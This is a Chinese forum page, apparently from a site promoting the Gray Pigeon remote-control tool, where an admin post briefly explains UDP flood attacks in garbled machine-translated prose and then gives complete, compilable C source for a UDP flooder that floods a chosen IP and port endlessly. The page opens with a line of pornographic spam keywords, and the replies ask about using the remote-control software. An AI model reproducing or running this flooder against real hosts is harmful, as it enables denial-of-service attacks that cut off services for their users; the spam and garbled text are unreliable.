久久精品中文字幕,狠狠色丁香婷婷综合,精品国产制服丝袜高跟,国内精品久久久久久久久齐齐 ,国模冰莲极品自慰人体

灰鴿子遠程控制軟件

標題: 在Linux [UDP]的DDoS攻擊 方案 代碼剖析 [打印本頁]

作者: admin    時間: 2014-3-6 11:03
標題: 在Linux [UDP]的DDoS攻擊 方案 代碼剖析
在Linux [UDP]的DDoS攻擊 方案 代碼
inux服務(wù)器用C編寫的腳本是我與UDP的DOS攻擊共用一個腳本。 編譯之后就可以使用。/ DDoS攻擊

UDP攻擊(UDP泛濫),UDP(用戶數(shù)據(jù)報協(xié)議)是一種DoS攻擊利用。 DoS攻擊使用UDP,TCP(傳輸控制協(xié)議)是比使用更復(fù)雜。 然而,在遠程計算機攻擊的大量隨機的UDP端口可以通過發(fā)送一個UDP包來啟動。 其結(jié)果是,在遠程計算機: 監(jiān)聽端口的應(yīng)用控制; 任何應(yīng)用程序偵聽端口看到它; 回應(yīng)與ICMP目的地不可達報文。 因此,大量的UDP數(shù)據(jù)包到受害系統(tǒng),迫使許多人發(fā)送ICMP數(shù)據(jù)包,從而導(dǎo)致無法通過其他客戶。



/*
compilation : gcc udp.c -o nom
utilisation  ( use ): ./nom ip port
exemple d'utilisation ( example of use ): ./udp 80.70.60.50 80
fonctionne sous linux ( works ): Debian, sunOS, BSD, kernel 2.2x avec gcc 4.x ou plus
RELEASE BY ²DSK ™ // d-sk@live.fr // If you add an update thank you for giving me this please // ENJOY
*/

#define UDP_STRING "level-23"
#define UDP_SIZE 9

#include <stdio.h>
#include <sys/param.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <stdarg.h>
#include <string.h>
#include <stdlib.h>

int connection(char *, short);

int connection(char *serveur, short port)
{
   struct sockaddr_in udp;
   struct hostent *bbs;
   int initsocket;
   bbs = gethostbyname(serveur);
   if (bbs==NULL) {
      printf("host inconnu: %s\n",serveur);
      exit(0);
   }
   printf("Innondation de paquet UDP sur %s:%d\n ", serveur, port);
   bzero((char*) &udp,sizeof(udp));
   bcopy(bbs->h_addr, (char *) &udp.sin_addr, bbs->h_length);
   udp.sin_family = bbs->h_addrtype;
   udp.sin_port = htons(port);
   initsocket = socket(AF_INET, SOCK_DGRAM, 0);
   connect(initsocket,(struct sockaddr *) &udp, sizeof(udp));
   return initsocket;
}


main(int argc, char **argv)
{
   int i;
   if(argc != 3)
   {
      fprintf(stderr, "Utilisation: %s ip port\n",argv[0]);
      exit(0);
   }
   i=connection(argv[1], atoi(argv[2]));
   for(;;)
   {
      send(i, UDP_STRING, UDP_SIZE, 0);
   }
}
作者: 熾楓    時間: 2014-7-12 13:56
用灰鴿子好像也是可以做營銷的。
作者: aaa1314    時間: 2014-7-14 20:30
我人在韓國,用灰鴿子會有影響嗎?
作者: 黑客526022555    時間: 2014-7-15 20:44
呃。來錯地方了,回復(fù)下吧。
作者: 零點的等候    時間: 2014-7-16 07:26
我現(xiàn)在還不會電腦安全,希望弄點這類教程。




歡迎光臨 灰鴿子遠程控制軟件 (http://www.wzgoogletg.cn/) Powered by Discuz! X3.4